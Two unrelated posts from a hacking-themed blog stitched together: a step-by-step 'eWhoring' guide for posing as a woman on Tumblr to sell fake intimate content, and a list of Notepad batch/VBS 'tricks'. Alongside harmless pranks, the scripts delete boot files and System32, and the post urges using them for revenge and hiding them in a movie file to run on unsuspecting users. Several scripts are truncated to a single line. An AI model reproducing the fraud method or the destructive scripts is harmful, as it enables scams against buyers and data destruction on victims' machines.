HACKFREAKS OFFICIAL Introduction Hey freaks! This article is shared by our friend. And today i’ll share his method or experiance with you. The author of the manual has been working with eWhoring for a long time. For 3 years he tried it on all social networks and, as he says, got a good profit everywhere. But the author of the manual has achieved huge success in this area on Tumblr. Interestingly, this platform was never considered suitable for working with drochers. Many people don’t realize that Tumblr is a goldmine for eWhoring. Why tumblr Another plus of Tumblr is that the number of subscribers is not displayed there. Nobody can find out how many people are subscribed to you and whether anyone is subscribed at all. Therefore, you do not need to spend money on cheating. A trifle, but nice. All of this has created a culture of girls selling private content on Tumblr: sex trade is not considered unacceptable there. It’s easy to build trust with users because there are a lot of real girls there. All of this makes Tumblr an ideal platform for working on a drocher. As stated, there are many live female sellers on Tumblr and they are in high demand. You can easily find them with these keywords: 👇 Even if you search for “PayPal”, more than 80% of the content will be associated with girls who sell intimate photos: 👇 Step 1. Setting up a profile Fundamental moment There is no point in showing how to create a new Tumblr account. And not because it is easy, but because the scheme does NOT work with new accounts. One of the workers got such an account blocked after it went out to $ 100 a day. It will be very disappointing if the same story happens to you. Therefore: 👇 We need an old Tumblr account. Her age must be at least 3 years old. This would seem to be a problem, but let’s look at the situation from the other side: this way the scheme will remain unbroken. 
Thanks to this unpleasant circumstance, we have less competition and fewer crooked performers that distort the market. In general, if you have an old account, you can start right away. The chance of being blocked is zero. So go ahead! Usually such a profile is either completely empty, or from 2 to 10 messages are published there. Here’s what the account looks like, which the author of the tutorial uses as an example: 👇 Initial settings As soon as you log into your account, there will be a toolbar like this: 👇 1️⃣ Delete all old messages. └A quick way to do this is to follow the link , select all messages and hit “Delete”. 2️⃣ Change the subject. └If the account is more than 5 years old, it will most likely contain an outdated theme. Go here , click on “Edit Topic” and select “Official Tumblr Site”. Account registration Now you need to register an account. To do this well, go over the profiles of girls who sell sex. So you will understand their style and form your own. To search, enter approximately the following keywords: 👇 ☑️ Onlyfans ☑️ Selling content ☑️ Selling n00ds ☑️ Bay my n00ds ☑️ Cashapp ☑️ Premium Snap ☑️ Private content ☑️ Sweet baby When you check 10–30 other profiles, click on the account icon and click “Edit Appearance”. What needs to be changed? 👇 1️⃣ Avatar and cover. 2️⃣ Name, profile name and description. 3️⃣ Colors. But the first thing to do is scroll down and disable all settings. The task is not to leave any buttons on. It should be like this: 👇 Avatar and cover Put an ordinary photo on your avatar, without sex. As a cover, you can already use something more honest, but without tin. See examples: 👇 If your pack doesn’t have a suitable photo for the cover, don’t worry. On some profiles, for example, they use this simple analogue: 👇 Name, profile title and description Name To find the right name, you first need to check which ones are already there and choose the best one. It’s all done here: 👇 There is a simple trick. 
First, choose a maiden name from this list . Now search for the selected name on this site . There is a huge database of girls from adult sites. Check that this slider is in this position: 👇 If we select, for example, “Sophie”, the search results will be like this: 👇 With this simple trick, you will find the right name very quickly. Profile name In this field you need to enter the name of the girl. We decided on him a minute ago. Description Here you need to give a little information about yourself: age, hobbies, etc. Plus, it should be unobtrusively noted that you are selling sex. Below are examples of good descriptions. Try not to copy it cleanly. Color spectrum Your task is to edit these 4 elements: 👇 You can google “Girly Colors” if you can’t decide: 👇 There is a way to check the color codes and font of other profile headings. Let’s say we want to understand what is used on this profile: 👇 Press “CTRL + U” (to view the source code of the page), then — “CRTL + F” (search command). And then we enter “Optica”. In the source code, the colors will be displayed like this: 👇 To check the “Heading Font” press “CRTL + F” and enter “font-family”. The font name will be displayed like this: 👇 If you have, for example, 10 accounts, it is best to use a pink color scheme for at least 3–5 of them. This is an unimportant moment, but there is some kind of intimate appeal in this color. But maybe, for example, like this: 👇 Summary This completes the first stage of preparation. We have fit into this article everything that could fit. The manual is very voluminous, so I had to divide it into several parts. In the next, we will analyze the content of the account — what content, how and why to publish in order to get a profit. See you later!
Hey Freaks! Hackfreaks here. Today we will digress a little from all the familiar topics, and I will show you what you can do with the most ordinary Notepad. And the coolest thing is that absolutely each of you can repeat it on your PC. Let's go!

IMPORTANT: If I accidentally wrote a dash somewhere instead of a minus in the code, change it to a minus. You will get an error at startup with the line number where the error is located. But everything seems to be in order, so just copy!

IMPORTANT: To stop a running script, terminate wscript.exe in the Processes tab of Task Manager.

So, here are 15 cool Notepad tricks you should try:

1. Continuously eject the CD drive using Notepad

Don't you think it would be fun to play a trick on your friend by ejecting his CD drive over and over again? Just enter the text below into Notepad and save it as a .vbs file. Double-click the .vbs file to see it work.

    Set oWMP = CreateObject("WMPlayer.OCX.7")
    Set colCDROMs = oWMP.cdromCollection
    do
        if colCDROMs.Count >= 1 then
            For i = 0 to colCDROMs.Count - 1
                colCDROMs.Item(i).Eject
            Next
            For i = 0 to colCDROMs.Count - 1
                colCDROMs.Item(i).Eject
            Next
        End If
        wscript.sleep 5000
    loop

2. Shutting down the computer using Notepad

Imagine that instead of clicking Start, then Shut down, then OK, you could simply double-click an icon to shut down the system. The code below does just that. It is a batch script, not VBScript, so save it as a .bat file and run it when you need to shut down the system.

    @echo off
    msg * System will now shut down
    shutdown -c "Bye!" -s

3. Always open Notepad on your friend's computer

Another trick to play on your friend's system is a batch file that opens Notepad over and over again:

    @ECHO off
    :top
    START %SystemRoot%\system32\notepad.exe
    GOTO top

4. Make a personal journal or diary

Notepad has a special function that lets us keep a journal.
Using it, we can create logs of things, as Notepad will insert the date and time for us whenever we open a certain type of log file. To do this, simply enter ".LOG" as the first line in Notepad and save the file under any name. Now, whenever you open that file, Notepad will automatically enter the date and time it was opened, and you can then make a journal entry and save it.

5. Matrix effect

We will now discuss a Notepad trick that turns the command prompt into something that looks like it came straight out of the Matrix movie, or out of a hacker's system. All you have to do is paste the following code into Notepad:

    @echo off
    color 02
    :start
    echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
    goto start

Now save this file with a .bat extension; after double-clicking the .bat file you created, you will see the effect. A small tweak: change the value after "color", that is the 02 in "color 02", to another value, for example 03; this changes the color of the text that appears in the command prompt.

6. Toggle Caps Lock repeatedly using Notepad

You can play with someone else's computer, or your own, with a script that toggles Caps Lock repeatedly. Just copy and paste the code below into Notepad.

    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
        wscript.sleep 100
        wshshell.sendkeys "{CAPSLOCK}"
    loop

Now save it as a .vbs file and run it to see the magic.

7. Type slowly

This trick makes text appear slowly, one fragment at a time. Just copy and paste the text below into Notepad and save it as a .vbs file.
    WScript.Sleep 180000
    WScript.Sleep 10000
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run "notepad"
    WScript.Sleep 100
    WshShell.AppActivate "Notepad"
    WScript.Sleep 500
    WshShell.SendKeys "Hel"
    WScript.Sleep 500
    WshShell.SendKeys "lo "
    WScript.Sleep 500
    WshShell.SendKeys ", ho"
    WScript.Sleep 500
    WshShell.SendKeys "wa"
    WScript.Sleep 500
    WshShell.SendKeys "re "
    WScript.Sleep 500
    WshShell.SendKeys "you"
    WScript.Sleep 500
    WshShell.SendKeys "? "
    WScript.Sleep 500
    WshShell.SendKeys "I a"
    WScript.Sleep 500
    WshShell.SendKeys "mg"
    WScript.Sleep 500
    WshShell.SendKeys "ood"
    WScript.Sleep 500
    WshShell.SendKeys " th"
    WScript.Sleep 500
    WshShell.SendKeys "ank"
    WScript.Sleep 500
    WshShell.SendKeys "s! "

8. Convert text to speech using Notepad

Just copy and paste the code below into Notepad and save it as a .vbs file. When you run it, you will get a dialog box asking what you want the computer to say. Have some fun.

    Dim message, sapi
    message=InputBox("What do you want me to say?", "Speak to Me")
    Set sapi=CreateObject("sapi.spvoice")
    sapi.Speak message

9. Removing boot files using Notepad

One way to destroy your computer is to delete the files that help it boot. While not recommended, this code has the authority to do so.

    @ECHO OFF
    ATTRIB -R -S -HC:\AUTOEXEC.BAT
    DEL C:\AUTOEXEC.BAT
    ATTRIB -R -S -HC:\BOOT.INI
    DEL C:\BOOT.INI
    ATTRIB -R -S -HC:\NTLDR
    DEL C:\NTLDR
    ATTRIB -R -S -HC:\WINDOWS\WIN.INI
    DEL C:\WINDOWS\WIN.INI

Save it as a .bat file. This will turn off the computer and delete the files necessary to bring it back to normal. Do not try this on your own computer unless you want to lose all of your data.

10. Deleting System32 files using Notepad

Want to get revenge on someone? Just use this code, save it as a .bat file and see what it does to that person's system. This will remove all the System32 files required for the system to function properly. Just paste the following into Notepad and save it as a .bat file.
    DEL C:\WINDOWS\SYSTEM32\*.*/Q

11. Hit Enter continuously

What if we want our Enter key to be pressed over and over? Rather than pressing it yourself, use the code below:

    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
        wscript.sleep 100
        wshshell.sendkeys "~(enter)"
    loop

Save it as a .vbs file and watch its magic.

12. Type something over and over again

The code for typing something over and over is given below; it will keep writing the text until you stop the loop.

    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
        wscript.sleep 100
        wshshell.sendkeys "I'll be typed again and again"
    loop

Save it as a .vbs file for it to work.

13. Computer crash

Displays a message on the screen that the system is infected and asks to restart the computer, and then opens many command prompts, calculators, Notepads and much more.

Script: on error resume next

14. Endlessly beeping system speaker

This VBS script makes the system speaker in the computer beep endlessly.

Script: Set S = CreateObject("Wscript.Shell")

15. The endlessly buzzing floppy disk drive

Action: simulates that there is a floppy disk in the floppy drive and makes it hum.

Script: Set WSHShell = WScript.CreateObject("WScript.Shell")

I think you know how you can apply them in practice. The simplest thing is to combine them into a single file with a Bat to Exe converter. For example, insert any script into some movie and run it. It will be very interesting to watch the reaction of an ordinary user. Thank you all for your attention!